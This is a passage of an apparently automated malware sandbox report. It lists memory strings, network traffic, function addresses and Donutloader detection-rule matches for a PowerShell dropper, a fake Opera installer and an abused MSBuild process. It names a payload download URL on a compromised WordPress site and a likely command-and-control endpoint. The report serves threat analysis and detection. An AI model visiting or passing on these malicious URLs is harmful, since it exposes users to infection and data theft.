                        Source: powershell.exe, 00000000.00000002.2371135913.0000000005461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: powershell.exe, 00000000.00000002.2381931476.00000000064C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000000.00000002.2381931476.00000000064C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000000.00000002.2381931476.00000000064C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: MSBuild.exe, 0000000D.00000002.2952198888.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfreamwave.cyou/api
                        Source: is-40U72.tmp.10.drString found in binary or memory: https://github.com/Azure/azure-rest-api-specs/blob/master/specification/resources/resource-manager/r
                        Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                        Source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                        Source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                        Source: powershell.exe, 00000000.00000002.2371135913.0000000005BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000000.00000002.2383933157.0000000007880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goAppVClientCmdlets.psm1h
                        Source: is-40U72.tmp.10.drString found in binary or memory: https://management.azure.com%2019-10-01-preview
                        Source: powershell.exe, 00000000.00000002.2381931476.00000000064C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: is-UDKGG.tmp.10.drString found in binary or memory: https://sectigo.com/CPS0
                        Source: is-UDKGG.tmp.10.drString found in binary or memory: https://sectigo.com/CPS0D
                        Source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                        Source: OperaAirSetup.exe, 0000000C.00000002.2856805548.0000000003371000.00000004.00000800.00020000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                        Source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                        Source: is-SBTFQ.tmp.10.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: powershell.exe, 00000000.00000002.2371135913.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.littlemoroccanthings.com
                        Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3369185807.00000290D8D35000.00000004.00000020.00020000.00000000.sdmp, wEY98gM1Jj.ps1String found in binary or memory: https://www.littlemoroccanthings.com/wp-content/plugins/header-footer-code-manager/images/TestLAB.ex
                        Source: is-SBTFQ.tmp.10.drString found in binary or memory: https://www.virtualbox.org/
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                        Source: unknownHTTPS traffic detected: 34.120.190.48:443 -> 192.168.2.6:49712 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49989 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49990 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49991 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49992 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49993 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49995 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49996 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49997 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043C160 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,13_2_0043C160
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043C160 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,13_2_0043C160
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043C2F0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,13_2_0043C2F0

                        System Summary

                        barindex
                        Source: 12.2.OperaAirSetup.exe.29b243e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                        Source: 12.2.OperaAirSetup.exe.29b243e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                        Source: 0000000C.00000002.2855864758.00000000029B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\cmd.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_04E3E4000_2_04E3E400
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9C1F312_2_00E9C1F3
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9BEDF12_2_00E9BEDF
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9C1EE12_2_00E9C1EE
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9C16D12_2_00E9C16D
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E8E20E12_2_00E8E20E
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E8461612_2_00E84616
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9A8DB12_2_00E9A8DB
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9A94912_2_00E9A949
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9ACAD12_2_00E9ACAD
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9AC8112_2_00E9AC81
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9AC1012_2_00E9AC10
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9AD6812_2_00E9AD68
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9AD6012_2_00E9AD60
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E8EFFA12_2_00E8EFFA
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9EF6612_2_00E9EF66
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E8115B12_2_00E8115B
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E8559812_2_00E85598
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00EA165A12_2_00EA165A
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9B74E12_2_00E9B74E
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00EB5AA012_2_00EB5AA0
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9BBC512_2_00E9BBC5
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9BB3C12_2_00E9BB3C
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9BB0D12_2_00E9BB0D
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9BB1212_2_00E9BB12
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9BD4712_2_00E9BD47
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9BD2812_2_00E9BD28
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9BD2C12_2_00E9BD2C
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00EB5E0012_2_00EB5E00
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E9BE1212_2_00E9BE12
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_029B03C112_2_029B03C1
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_02AD9A8212_2_02AD9A82
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_029B000012_2_029B0000
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_02ADBC1E12_2_02ADBC1E
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_02ADE47612_2_02ADE476
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_02ADB17E12_2_02ADB17E
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_02ADA97612_2_02ADA976
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_02ADAD4612_2_02ADAD46
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_0304D48012_2_0304D480
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_030493E712_2_030493E7
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_030493F012_2_030493F0
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_03049D4012_2_03049D40
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_03049D8012_2_03049D80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004490B013_2_004490B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004411E013_2_004411E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004101B813_2_004101B8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042AAC013_2_0042AAC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043339B13_2_0043339B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00411BB413_2_00411BB4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040BC0013_2_0040BC00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043F57813_2_0043F578
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041252613_2_00412526
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00426E0013_2_00426E00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044861013_2_00448610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00440EF013_2_00440EF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043AEAB13_2_0043AEAB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042D7E013_2_0042D7E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040104013_2_00401040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041286813_2_00412868
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042B00013_2_0042B000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040480213_2_00404802
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040701613_2_00407016
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004480D013_2_004480D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043B8D413_2_0043B8D4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041E0F613_2_0041E0F6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044588C13_2_0044588C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040909013_2_00409090
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040F0B013_2_0040F0B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004238B013_2_004238B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004408B013_2_004408B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042190413_2_00421904
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004489E013_2_004489E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004479A013_2_004479A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00433A5913_2_00433A59
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042B27013_2_0042B270
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042A20413_2_0042A204
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043921013_2_00439210
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00435AF013_2_00435AF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00433AFC13_2_00433AFC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00444A9013_2_00444A90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004222A013_2_004222A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00422B4013_2_00422B40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041634213_2_00416342
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00433B4D13_2_00433B4D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00408B5013_2_00408B50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00402B6013_2_00402B60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040CB3013_2_0040CB30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042DBD013_2_0042DBD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00441BE013_2_00441BE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042DBF013_2_0042DBF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00447BB013_2_00447BB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00447C4013_2_00447C40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040D45D13_2_0040D45D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043BC6013_2_0043BC60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00438C7813_2_00438C78
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042B41113_2_0042B411
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041CC2513_2_0041CC25
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041F43013_2_0041F430
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040ECCF13_2_0040ECCF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00447CD013_2_00447CD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043FCE013_2_0043FCE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00430C9013_2_00430C90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043950013_2_00439500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00448D0013_2_00448D00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042ED3C13_2_0042ED3C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00410DE013_2_00410DE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040ADF013_2_0040ADF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040358013_2_00403580
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00425E4413_2_00425E44
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043065113_2_00430651
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044065013_2_00440650
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041CE5F13_2_0041CE5F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00407E6013_2_00407E60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00419E6013_2_00419E60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040961013_2_00409610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041062013_2_00410620
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041C63113_2_0041C631
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042363013_2_00423630
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042CEC013_2_0042CEC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004376C713_2_004376C7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040C6F013_2_0040C6F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00416E8013_2_00416E80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00422E9013_2_00422E90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004276A013_2_004276A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00421EBA13_2_00421EBA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040BF4013_2_0040BF40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040B76013_2_0040B760
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044271E13_2_0044271E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00403F2013_2_00403F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00441F3013_2_00441F30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041EF3813_2_0041EF38
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004387D513_2_004387D5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00432FF013_2_00432FF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042F78013_2_0042F780
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004027B013_2_004027B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00419E50 appears 111 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0040B450 appears 51 times
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: String function: 00EA15E0 appears 59 times
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: String function: 00EB9C97 appears 90 times
                        Source: cmd.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                        Source: cmd.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                        Source: cmd.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                        Source: cmd.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                        Source: 12.2.OperaAirSetup.exe.29b243e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                        Source: 12.2.OperaAirSetup.exe.29b243e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                        Source: 0000000C.00000002.2855864758.00000000029B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
